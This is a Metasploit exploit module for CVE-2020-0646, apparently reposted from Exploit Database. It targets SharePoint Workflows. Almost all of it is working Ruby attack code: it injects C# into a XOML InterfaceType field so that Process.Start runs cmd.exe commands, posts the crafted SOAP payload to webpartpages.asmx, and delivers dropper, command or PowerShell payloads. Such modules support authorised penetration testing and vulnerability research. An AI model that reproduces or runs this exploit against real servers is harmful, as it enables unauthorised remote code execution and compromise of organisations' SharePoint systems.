SharePoint Workflows – XOML Injection (Metasploit)

• Exploit Database
• 12 阅读

• 作者： Metasploit
  日期： 2020-03-31
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48275/

• # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  
  class MetasploitModule < Msf::Exploit::Remote
  
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::AutoCheck
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'SharePoint Workflows XOML Injection',
  'Description' => %q{
  This module exploits a vulnerability within SharePoint and its .NET backend
  that allows an attacker to execute commands using specially crafted XOML data
  sent to SharePoint via the Workflows functionality.
  },
  'Author' => [
  'Spencer McIntyre',
  'Soroush Dalili'
  ],
  'License' => MSF_LICENSE,
  'References' => [
  ['CVE', '2020-0646'],
  ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
  ],
  'Platform' => 'win',
  'Targets' => [
  [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
  [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
  [ 'Windows Powershell',
  'Arch' => [ARCH_X86, ARCH_X64],
  'Type' => :windows_powershell
  ]
  ],
  'DefaultOptions' => {
  'RPORT' => 443,
  'SSL' => true
  },
  'DefaultTarget' => 0,
  'DisclosureDate' => '2020-03-02',
  'Notes' =>
  {
  'Stability' => [CRASH_SAFE,],
  'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
  'Reliability' => [REPEATABLE_SESSION],
  },
  'Privileged' => true
  ))
  
  register_options([
  OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
  OptString.new('DOMAIN',[ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
  OptString.new('USERNAME',[ true, 'Username to authenticate as', '' ]),
  OptString.new('PASSWORD',[ true, 'The password to authenticate with' ])
  ])
  end
  
  def check
  res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
  return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200
  
  compiler_errors = extract_compiler_errors(res)
  return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0
  
  # once patched you get a specific compiler error message about the type name
  return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/
  
  CheckCode::Vulnerable
  end
  
  def extract_compiler_errors(res)
  return nil unless res&.code == 200
  
  xml_doc = res.get_xml_document
  result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
  return nil if result.length == 0
  
  xml_result = Nokogiri::XML(result)
  xml_result.xpath('//CompilerError/@Text')
  end
  
  def exploit
  # NOTE: Automatic check is implemented by the AutoCheck mixin
  super
  
  case target['Type']
  when :windows_command
  execute_command(payload.encoded)
  when :windows_dropper
  cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
  execute_cmdstager({linemax: cmd_target.opts['Space']})
  when :windows_powershell
  execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
  end
  end
  
  def escape_command(cmd)
  # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
  cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
  end
  
  def execute_command(cmd, opts = {})
  xoml_data = <<-EOS
  <?xml version="1.0" encoding="utf-8"?>
  <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
  <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
  <workflowMarkupText>
  <![CDATA[
  <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
  <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
  </SequentialWorkflowActivity>
  ]]>
  </workflowMarkupText>
  <rulesText></rulesText>
  <configBlob></configBlob>
  <flag>2</flag>
  </ValidateWorkflowMarkupAndCreateSupportObjects>
  </soap:Body>
  </soap:Envelope>
  EOS
  
  res = send_request_cgi({
  'method' => 'POST',
  'uri'=> normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
  'ctype'=> 'text/xml; charset=utf-8',
  'data' => xoml_data,
  'username' => datastore['USERNAME'],
  'password' => datastore['PASSWORD']
  })
  
  unless res&.code == 200
  print_error('Non-200 HTTP response received while trying to execute the command')
  end
  
  res
  end
  end